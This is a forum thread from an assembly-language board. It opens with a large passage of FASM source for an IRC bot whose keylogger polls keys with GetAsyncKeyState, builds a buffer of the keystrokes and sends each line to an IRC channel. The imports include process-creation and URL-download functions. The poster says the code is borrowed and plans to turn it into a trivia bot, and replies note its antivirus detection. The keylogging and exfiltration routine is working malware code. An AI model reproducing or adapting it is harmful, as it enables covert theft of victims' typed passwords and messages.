        je IsSpace                                              ;if it is this key, jump there

        cmp ebx, 8h                                             ;VK_BACK
        je IsBack                                               ;if it is this key, jump there

        cmp ebx, 9h                                             ;VK_TAB
        je IsTab                                                ;if it is this key, jump there

        cmp ebx, 60h                                            ;VK_NUMPAD0
        je IsNumpad0                                            ;if it is this key, jump there

        cmp ebx, 61h                                            ;VK_NUMPAD1
        je IsNumpad1                                            ;if it is this key, jump there

        cmp ebx, 62h                                            ;VK_NUMPAD2
        je IsNumpad2                                            ;if it is this key, jump there

        cmp ebx, 63h                                            ;VK_NUMPAD3
        je IsNumpad3                                            ;if it is this key, jump there

        cmp ebx, 64h                                            ;VK_NUMPAD4
        je IsNumpad4                                            ;if it is this key, jump there

        cmp ebx, 65h                                            ;VK_NUMPAD5
        je IsNumpad5                                            ;if it is this key, jump there

        cmp ebx, 66h                                            ;VK_NUMPAD6
        je IsNumpad6                                            ;if it is this key, jump there

        cmp ebx, 67h                                            ;VK_NUMPAD7
        je IsNumpad7                                            ;if it is this key, jump there

        cmp ebx, 68h                                            ;VK_NUMPAD8
        je IsNumpad8                                            ;if it is this key, jump there

        cmp ebx, 69h                                            ;VK_NUMPAD9
        je IsNumpad9                                            ;if it is this key, jump there

        cmp ebx, 0Dh                                            ;VK_RETURN
        je IsReturn                                             ;if it is this key, jump there

        cmp ebx, 30h                                            ;VK_0
        jae CheckIsKey                                          ;if its above "1" its possible key

ScanNextKey:                                                    ;check next key if its pressed
        inc ebx                                                 ;increase counter by one
        jmp NextKey                                             ;check it baby

CheckIsKey:
        cmp ebx, 5Ah                                            ;VK_Z
        jbe IsKey                                               ;is key from 1 - Z

        jmp ScanNextKey                                         ;nop, scan next one

IsSpace:                                                        ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                " "

        jmp LiveKeylog

IsBack:                                                         ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "{back}"

        jmp LiveKeylog

IsTab:                                                          ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "{tab}"

        jmp LiveKeylog

IsNumpad0:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "0"

        jmp LiveKeylog

IsNumpad1:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "1"

        jmp LiveKeylog

IsNumpad2:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "2"

        jmp LiveKeylog

IsNumpad3:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "3"

        jmp LiveKeylog

IsNumpad4:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "4"

        jmp LiveKeylog

IsNumpad5:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "5"

        jmp LiveKeylog

IsNumpad6:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "6"

        jmp LiveKeylog

IsNumpad7:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "7"

        jmp LiveKeylog

IsNumpad8:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "8"

        jmp LiveKeylog

IsNumpad9:                                                      ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "9"

        jmp LiveKeylog

IsReturn:                                                       ;cat other key to buffer
        invoke lstrcat,\
                KeylogBuffer,\
                "{crlf}"

        jmp LiveKeylog

IsKey:                                                          ;cat key to buffer
        mov dword [ByteBuffer], ebx                             ;key is in ebx

        invoke lstrcat,\                                        ;append it to the keylog buffer
                KeylogBuffer,\                                  ;to this
                ByteBuffer                                      ;the logged key

        jmp LiveKeylog                                          ;log next key

SendKeyLine:
        invoke lstrcpy,\                                        ;send complete line to channel
                SendBuffer,\                                    ;copy to send buffer
                "PRIVMSG "                                      ;irc command

        invoke lstrcat,\                                        ;append channel
                SendBuffer,\                                    ;to buffer
                Channel                                         ;this

        invoke lstrcat,\                                        ;cat :
                SendBuffer,\                                    ;to buffer
                " :"                                            ;guess

        invoke lstrcat,\                                        ;append logged buffer
                SendBuffer,\                                    ;to send buffer
                KeylogBuffer                                    ;from here

        call SendLine                                           ;send line to irc server

        mov dword [KeylogBuffer], 0                             ;empty buffer
        jmp LiveKeylog                                          ;log next

ret                                                             ;return to call


section '.idata' import data readable writeable                 ;imports
        library kernel,                 "kernel32.dll",\
                winsock,                "ws2_32.dll",\
                user,                   "user32.dll",\
                advapi,                 "advapi32.dll",\
                wininet,                "wininet.dll"

        import kernel,\
                lstrcpy,                "lstrcpyA",\
                lstrcpyn,               "lstrcpynA",\
                lstrcat,                "lstrcatA",\
                lstrcmp,                "lstrcmpA",\
                lstrlen,                "lstrlenA",\
                GetTickCount,           "GetTickCount",\
                Sleep,                  "Sleep",\
                CreateFile,             "CreateFileA",\
                WriteFile,              "WriteFile",\
                CloseHandle,            "CloseHandle",\
                CreateProcess,          "CreateProcessA",\
                CreateThread,           "CreateThread",\
                GetExitCodeThread,      "GetExitCodeThread",\
                TerminateThread,        "TerminateThread",\
                GetSystemDirectory,     "GetSystemDirectoryA",\
                ExitProcess,            "ExitProcess"

        import winsock,\
                WSAStartup,             "WSAStartup",\
                socket,                 "socket",\
                inet_addr,              "inet_addr",\
                htons,                  "htons",\
                connect,                "connect",\
                recv,                   "recv",\
                send,                   "send",\
                WSACleanup,             "WSACleanup"

        import advapi,\
                GetUserName,            "GetUserNameA"

        import user,\
                CharLowerBuff,          "CharLowerBuffA",\
                MessageBox,             "MessageBoxA",\
                GetAsyncKeyState,       "GetAsyncKeyState"

        import wininet,\
                InternetOpen,           "InternetOpenA",\
                InternetOpenUrl,        "InternetOpenUrlA",\
                InternetReadFile,       "InternetReadFile",\
                InternetCloseHandle,    "InternetCloseHandle"
    


I know the code is a mess, but it's not mine. I was planning on stripping it down to it's bare essentials so I can learn the IRC protocol and create a trivia bot. Hopefully I will be able to figure out a fix for this prefix.
Post 12 Jun 2015, 02:08
View user's profile Send private message Reply with quote
RIxRIpt



Joined: 18 Apr 2013
Posts: 50
RIxRIpt
You can try to display your buffer in a MessageBox and count your self, what's the problem?
BTW That's VT of your src Very Happy
Post 12 Jun 2015, 09:01
View user's profile Send private message Visit poster's website Reply with quote
Jesse Redick



Joined: 11 Jan 2011
Posts: 15
Jesse Redick
RIxRIpt wrote:
You can try to display your buffer in a MessageBox and count your self, what's the problem?
BTW That's VT of your src Very Happy


I tried what you said, once with ReturnBuffer and once with EBX. It either crashes or doesn't execute at all.

Lol yeah. This source has lot of junk in it. But I plan on stripping all of that crap out and re-coding it entirely. It was pretty much the only source I could find that showed the IRC protocol in a decently documented way. I refuse to believe that it should be this hard to change a simple prefix though.

If I can't get any help with this, I might just rebuild it from the ground up with just the connection first, then try to figure out commands later.
Post 12 Jun 2015, 11:10
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
I don't see revolution screaming "malware". But If I upload a banking bot code tutorial she/he/it will cry her/his/its guts out.
Post 17 Jun 2015, 17:30
View user's profile Send private message Reply with quote
PeExecutable



Joined: 26 Jun 2015
Posts: 181
PeExecutable
Nothing is more "fucked up" than the IRC protocol and there is a very good reason for that, it was designed in a time when nothing made any sense and nothing needed to make any sense.

The best way to make anything related to IRC work, is that you divide the code up very nicely so you can keep track of everything. I've made many irc clients, not too long ago I thought about writing an irc bnc in a slightly different way than usual.

Just make sure you keep things organized when dealing with IRC code because it's a fucked up protocol. But once you get it working, and get it tweaked to work very nicely, then it works very nicely of course, and I suppose that is the goal. Very Happy
Post 17 Jul 2015, 21:33
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar. Also on GitHub, YouTube, Twitter.

Website powered by rwasa.